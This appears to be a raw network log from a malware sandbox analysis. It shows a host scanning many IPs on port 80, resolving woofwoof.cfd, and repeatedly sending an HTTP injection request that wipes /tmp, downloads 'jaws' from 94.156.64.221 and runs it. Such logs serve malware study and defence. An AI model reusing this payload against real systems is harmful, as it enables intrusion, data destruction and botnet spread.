                    Jun 1, 2024 18:15:54.238457918 CEST8052274106.72.36.51192.168.2.23
                    Jun 1, 2024 18:15:54.238462925 CEST4802680192.168.2.23124.204.6.25
                    Jun 1, 2024 18:15:54.238462925 CEST4595880192.168.2.23146.155.139.101
                    Jun 1, 2024 18:15:54.238471031 CEST804957042.187.49.118192.168.2.23
                    Jun 1, 2024 18:15:54.238476992 CEST5480880192.168.2.23118.249.69.78
                    Jun 1, 2024 18:15:54.238483906 CEST8049860145.13.166.240192.168.2.23
                    Jun 1, 2024 18:15:54.238492012 CEST3649480192.168.2.23147.135.44.218
                    Jun 1, 2024 18:15:54.238497019 CEST5227480192.168.2.23106.72.36.51
                    Jun 1, 2024 18:15:54.238506079 CEST4957080192.168.2.2342.187.49.118
                    Jun 1, 2024 18:15:54.238523006 CEST5802680192.168.2.2359.172.71.185
                    Jun 1, 2024 18:15:54.238523960 CEST4986080192.168.2.23145.13.166.240
                    Jun 1, 2024 18:15:54.238533020 CEST5802680192.168.2.2359.172.71.185
                    Jun 1, 2024 18:15:54.238545895 CEST5831280192.168.2.2359.172.71.185
                    Jun 1, 2024 18:15:54.238559961 CEST4319680192.168.2.2360.224.142.1
                    Jun 1, 2024 18:15:54.238568068 CEST4319680192.168.2.2360.224.142.1
                    Jun 1, 2024 18:15:54.238595963 CEST4348280192.168.2.2360.224.142.1
                    Jun 1, 2024 18:15:54.238595963 CEST3293680192.168.2.23189.82.218.132
                    Jun 1, 2024 18:15:54.238624096 CEST3322280192.168.2.23189.82.218.132
                    Jun 1, 2024 18:15:54.238624096 CEST3293680192.168.2.23189.82.218.132
                    Jun 1, 2024 18:15:54.238640070 CEST5303280192.168.2.2353.223.178.64
                    Jun 1, 2024 18:15:54.238640070 CEST5303280192.168.2.2353.223.178.64
                    Jun 1, 2024 18:15:54.238667965 CEST5331880192.168.2.2353.223.178.64
                    Jun 1, 2024 18:15:54.238678932 CEST5936880192.168.2.2345.9.82.52
                    Jun 1, 2024 18:15:54.238678932 CEST5936880192.168.2.2345.9.82.52
                    Jun 1, 2024 18:15:54.238701105 CEST5965280192.168.2.2345.9.82.52
                    Jun 1, 2024 18:15:54.238704920 CEST805003699.223.38.236192.168.2.23
                    Jun 1, 2024 18:15:54.238708019 CEST8043072107.118.12.96192.168.2.23
                    Jun 1, 2024 18:15:54.238712072 CEST3994080192.168.2.2369.42.202.171
                    Jun 1, 2024 18:15:54.238723040 CEST3994080192.168.2.2369.42.202.171
                    Jun 1, 2024 18:15:54.238738060 CEST8038226156.33.185.72192.168.2.23
                    Jun 1, 2024 18:15:54.238739014 CEST4022480192.168.2.2369.42.202.171
                    Jun 1, 2024 18:15:54.238761902 CEST3514080192.168.2.2324.72.9.82
                    Jun 1, 2024 18:15:54.238761902 CEST8035692211.152.213.185192.168.2.23
                    Jun 1, 2024 18:15:54.238775015 CEST5003680192.168.2.2399.223.38.236
                    Jun 1, 2024 18:15:54.238779068 CEST4307280192.168.2.23107.118.12.96
                    Jun 1, 2024 18:15:54.238779068 CEST3822680192.168.2.23156.33.185.72
                    Jun 1, 2024 18:15:54.238790035 CEST3514080192.168.2.2324.72.9.82
                    Jun 1, 2024 18:15:54.238794088 CEST8055520118.167.64.175192.168.2.23
                    Jun 1, 2024 18:15:54.238807917 CEST8044968176.78.160.138192.168.2.23
                    Jun 1, 2024 18:15:54.238811016 CEST5677480192.168.2.23145.92.78.73
                    Jun 1, 2024 18:15:54.238817930 CEST3542480192.168.2.2324.72.9.82
                    Jun 1, 2024 18:15:54.238818884 CEST5677480192.168.2.23145.92.78.73
                    Jun 1, 2024 18:15:54.238821030 CEST803830687.233.87.119192.168.2.23
                    Jun 1, 2024 18:15:54.238821983 CEST3569280192.168.2.23211.152.213.185
                    Jun 1, 2024 18:15:54.238833904 CEST804268213.15.216.154192.168.2.23
                    Jun 1, 2024 18:15:54.238836050 CEST5552080192.168.2.23118.167.64.175
                    Jun 1, 2024 18:15:54.238836050 CEST4496880192.168.2.23176.78.160.138
                    Jun 1, 2024 18:15:54.238847017 CEST803368841.108.232.85192.168.2.23
                    Jun 1, 2024 18:15:54.238858938 CEST5705880192.168.2.23145.92.78.73
                    Jun 1, 2024 18:15:54.238863945 CEST4045680192.168.2.23132.66.64.38
                    Jun 1, 2024 18:15:54.238876104 CEST3830680192.168.2.2387.233.87.119
                    Jun 1, 2024 18:15:54.238879919 CEST4045680192.168.2.23132.66.64.38
                    Jun 1, 2024 18:15:54.238905907 CEST4074080192.168.2.23132.66.64.38
                    Jun 1, 2024 18:15:54.238909006 CEST4268280192.168.2.2313.15.216.154
                    Jun 1, 2024 18:15:54.238913059 CEST3319480192.168.2.23222.37.4.5
                    Jun 1, 2024 18:15:54.238930941 CEST3319480192.168.2.23222.37.4.5
                    Jun 1, 2024 18:15:54.238949060 CEST3347480192.168.2.23222.37.4.5
                    Jun 1, 2024 18:15:54.238960981 CEST3368880192.168.2.2341.108.232.85
                    Jun 1, 2024 18:15:54.238960981 CEST3735080192.168.2.2366.47.79.133
                    Jun 1, 2024 18:15:54.238986969 CEST3763080192.168.2.2366.47.79.133
                    Jun 1, 2024 18:15:54.239075899 CEST3331880192.168.2.2367.147.165.34
                    Jun 1, 2024 18:15:54.239084005 CEST3331880192.168.2.2367.147.165.34
                    Jun 1, 2024 18:15:54.239084005 CEST8053534219.191.228.10192.168.2.23
                    Jun 1, 2024 18:15:54.239099026 CEST805094076.115.82.134192.168.2.23
                    Jun 1, 2024 18:15:54.239109039 CEST3359680192.168.2.2367.147.165.34
                    Jun 1, 2024 18:15:54.239111900 CEST3735080192.168.2.2366.47.79.133
                    Jun 1, 2024 18:15:54.239111900 CEST5346680192.168.2.2395.127.175.227
                    Jun 1, 2024 18:15:54.239130974 CEST5353480192.168.2.23219.191.228.10
                    Jun 1, 2024 18:15:54.239137888 CEST5346680192.168.2.2395.127.175.227
                    Jun 1, 2024 18:15:54.239137888 CEST8044588176.104.168.239192.168.2.23
                    Jun 1, 2024 18:15:54.239139080 CEST5094080192.168.2.2376.115.82.134
                    Jun 1, 2024 18:15:54.239140034 CEST5374480192.168.2.2395.127.175.227
                    Jun 1, 2024 18:15:54.239156961 CEST8049912116.128.48.224192.168.2.23
                    Jun 1, 2024 18:15:54.239157915 CEST4861480192.168.2.23179.122.233.207
                    Jun 1, 2024 18:15:54.239157915 CEST4861480192.168.2.23179.122.233.207
                    Jun 1, 2024 18:15:54.239170074 CEST8059202104.134.7.68192.168.2.23
                    Jun 1, 2024 18:15:54.239181995 CEST4458880192.168.2.23176.104.168.239
                    Jun 1, 2024 18:15:54.239190102 CEST4889280192.168.2.23179.122.233.207
                    Jun 1, 2024 18:15:54.239198923 CEST8035516209.98.115.136192.168.2.23
                    Jun 1, 2024 18:15:54.239201069 CEST4488880192.168.2.23161.43.121.185
                    Jun 1, 2024 18:15:54.239209890 CEST5920280192.168.2.23104.134.7.68
                    Jun 1, 2024 18:15:54.239211082 CEST4991280192.168.2.23116.128.48.224
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jun 1, 2024 18:15:51.189591885 CEST192.168.2.238.8.8.80xfd6bStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:15:56.194118023 CEST192.168.2.238.8.8.80xfd6bStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:15:57.215956926 CEST192.168.2.238.8.8.80xa960Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:15:58.232933044 CEST192.168.2.238.8.8.80xd1a0Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:00.098161936 CEST192.168.2.238.8.8.80x8812Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:01.116348028 CEST192.168.2.238.8.8.80xbbe7Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:05.164731979 CEST192.168.2.238.8.8.80xbcc8Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:06.182653904 CEST192.168.2.238.8.8.80x396fStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:08.285234928 CEST192.168.2.238.8.8.80xd4bbStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:09.302061081 CEST192.168.2.238.8.8.80xfdc1Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:13.352881908 CEST192.168.2.238.8.8.80x989eStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:18.357532978 CEST192.168.2.238.8.8.80x989eStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:19.374722004 CEST192.168.2.238.8.8.80xe441Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:24.379247904 CEST192.168.2.238.8.8.80xe441Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:26.164760113 CEST192.168.2.238.8.8.80x82bfStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:27.321373940 CEST192.168.2.238.8.8.80x964bStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:28.345340967 CEST192.168.2.238.8.8.80x67cbStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:32.242736101 CEST192.168.2.238.8.8.80xdbb1Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:33.260905981 CEST192.168.2.238.8.8.80x61e1Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:34.280924082 CEST192.168.2.238.8.8.80x29fStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:35.126147985 CEST192.168.2.238.8.8.80xe130Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:43.270297050 CEST192.168.2.238.8.8.80x4b48Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:48.274827003 CEST192.168.2.238.8.8.80x4b48Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:56.514616966 CEST192.168.2.238.8.8.80x78d5Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:57.532371998 CEST192.168.2.238.8.8.80x93c0Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:58.549632072 CEST192.168.2.238.8.8.80x7857Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:59.567305088 CEST192.168.2.238.8.8.80x6059Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:04.571839094 CEST192.168.2.238.8.8.80x6059Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:05.614224911 CEST192.168.2.238.8.8.80x29baStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:10.618747950 CEST192.168.2.238.8.8.80x29baStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:11.654594898 CEST192.168.2.238.8.8.80x7eceStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:16.659096003 CEST192.168.2.238.8.8.80x7eceStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:18.599935055 CEST192.168.2.238.8.8.80x3abbStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:19.551208973 CEST192.168.2.238.8.8.80x1887Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:20.454081059 CEST192.168.2.238.8.8.80x3c80Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:22.321091890 CEST192.168.2.238.8.8.80x6f10Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:27.325680971 CEST192.168.2.238.8.8.80x6f10Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:28.294080019 CEST192.168.2.238.8.8.80x82b9Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:29.139549971 CEST192.168.2.238.8.8.80x2684Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:30.054464102 CEST192.168.2.238.8.8.80x5240Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:31.130260944 CEST192.168.2.238.8.8.80x3f33Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:32.018155098 CEST192.168.2.238.8.8.80xa8eaStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:32.918770075 CEST192.168.2.238.8.8.80xb5f5Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:33.934248924 CEST192.168.2.238.8.8.80xa17dStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:34.783112049 CEST192.168.2.238.8.8.80x582bStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:35.716855049 CEST192.168.2.238.8.8.80xd5c1Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:36.652827024 CEST192.168.2.238.8.8.80x19d3Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:37.501908064 CEST192.168.2.238.8.8.80x71c6Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:38.412972927 CEST192.168.2.238.8.8.80xe5c6Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:40.357511997 CEST192.168.2.238.8.8.80xee8Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:41.261725903 CEST192.168.2.238.8.8.80x26e6Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:42.160693884 CEST192.168.2.238.8.8.80xd461Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:43.080421925 CEST192.168.2.238.8.8.80xabStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:43.929063082 CEST192.168.2.238.8.8.80x6463Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:44.881719112 CEST192.168.2.238.8.8.80xa2bcStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:45.737704039 CEST192.168.2.238.8.8.80x55aStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:46.650670052 CEST192.168.2.238.8.8.80x8fd8Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:47.552581072 CEST192.168.2.238.8.8.80xb8deStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:48.462197065 CEST192.168.2.238.8.8.80x7ae6Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:49.395214081 CEST192.168.2.238.8.8.80x8783Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:50.321751118 CEST192.168.2.238.8.8.80x921bStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:51.256985903 CEST192.168.2.238.8.8.80xcff3Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:52.225369930 CEST192.168.2.238.8.8.80xa16fStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:53.145251989 CEST192.168.2.238.8.8.80x58d7Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:54.110599995 CEST192.168.2.238.8.8.80x1383Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:54.990837097 CEST192.168.2.238.8.8.80xac26Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:55.877866983 CEST192.168.2.238.8.8.80x4620Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jun 1, 2024 18:15:56.201210976 CEST8.8.8.8192.168.2.230xfd6bNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:15:57.222728968 CEST8.8.8.8192.168.2.230xa960No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:15:58.239224911 CEST8.8.8.8192.168.2.230xd1a0No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:00.105706930 CEST8.8.8.8192.168.2.230x8812No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:01.123456001 CEST8.8.8.8192.168.2.230xbbe7No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:05.172431946 CEST8.8.8.8192.168.2.230xbcc8No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:07.193259954 CEST8.8.8.8192.168.2.230x396fNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:08.291667938 CEST8.8.8.8192.168.2.230xd4bbNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:09.309264898 CEST8.8.8.8192.168.2.230xfdc1No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:18.363898039 CEST8.8.8.8192.168.2.230x989eNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:24.385596991 CEST8.8.8.8192.168.2.230xe441No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:26.225907087 CEST8.8.8.8192.168.2.230x82bfNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:27.328929901 CEST8.8.8.8192.168.2.230x964bNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:28.352008104 CEST8.8.8.8192.168.2.230x67cbNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:32.249161959 CEST8.8.8.8192.168.2.230xdbb1No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:33.268043041 CEST8.8.8.8192.168.2.230x61e1No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:34.288223028 CEST8.8.8.8192.168.2.230x29fNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:35.132836103 CEST8.8.8.8192.168.2.230xe130No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:48.284291983 CEST8.8.8.8192.168.2.230x4b48No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:56.521859884 CEST8.8.8.8192.168.2.230x78d5No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:57.538954973 CEST8.8.8.8192.168.2.230x93c0No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:16:58.556766033 CEST8.8.8.8192.168.2.230x7857No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:04.579651117 CEST8.8.8.8192.168.2.230x6059No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:10.630484104 CEST8.8.8.8192.168.2.230x29baNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:16.665657043 CEST8.8.8.8192.168.2.230x7eceNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:18.606806993 CEST8.8.8.8192.168.2.230x3abbNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:19.557622910 CEST8.8.8.8192.168.2.230x1887No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:20.461690903 CEST8.8.8.8192.168.2.230x3c80No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:27.332559109 CEST8.8.8.8192.168.2.230x6f10No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:28.300909042 CEST8.8.8.8192.168.2.230x82b9No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:29.146368027 CEST8.8.8.8192.168.2.230x2684No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:30.061561108 CEST8.8.8.8192.168.2.230x5240No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:31.137162924 CEST8.8.8.8192.168.2.230x3f33No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:32.024545908 CEST8.8.8.8192.168.2.230xa8eaNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:32.925200939 CEST8.8.8.8192.168.2.230xb5f5No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:33.941641092 CEST8.8.8.8192.168.2.230xa17dNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:34.789367914 CEST8.8.8.8192.168.2.230x582bNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:35.723345995 CEST8.8.8.8192.168.2.230xd5c1No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:36.659558058 CEST8.8.8.8192.168.2.230x19d3No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:37.508824110 CEST8.8.8.8192.168.2.230x71c6No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:38.420082092 CEST8.8.8.8192.168.2.230xe5c6No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:40.364537001 CEST8.8.8.8192.168.2.230xee8No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:41.268346071 CEST8.8.8.8192.168.2.230x26e6No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:42.167071104 CEST8.8.8.8192.168.2.230xd461No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:43.086787939 CEST8.8.8.8192.168.2.230xabNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:43.935293913 CEST8.8.8.8192.168.2.230x6463No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:44.888847113 CEST8.8.8.8192.168.2.230xa2bcNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:45.744102955 CEST8.8.8.8192.168.2.230x55aNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:46.657850027 CEST8.8.8.8192.168.2.230x8fd8No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:47.559705019 CEST8.8.8.8192.168.2.230xb8deNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:48.469207048 CEST8.8.8.8192.168.2.230x7ae6No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:49.402276039 CEST8.8.8.8192.168.2.230x8783No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:50.328414917 CEST8.8.8.8192.168.2.230x921bNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:51.265249014 CEST8.8.8.8192.168.2.230xcff3No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:52.233017921 CEST8.8.8.8192.168.2.230xa16fNo error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:53.152551889 CEST8.8.8.8192.168.2.230x58d7No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:54.117583990 CEST8.8.8.8192.168.2.230x1383No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:54.998084068 CEST8.8.8.8192.168.2.230xac26No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Jun 1, 2024 18:17:55.884429932 CEST8.8.8.8192.168.2.230x4620No error (0)woofwoof.cfd94.156.64.221A (IP address)IN (0x0001)false
                    Session IDSource IPSource PortDestination IPDestination Port
                    0192.168.2.2335232146.154.17.10280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237476110 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    1192.168.2.2340304176.184.31.10880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237533092 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    2192.168.2.2342174118.56.224.8180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237569094 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    3192.168.2.2357450138.193.26.7080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237611055 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    4192.168.2.2345786134.10.23.16780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237648964 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    5192.168.2.234853091.176.40.17380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237679005 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    6192.168.2.2353384115.206.192.21480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237729073 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
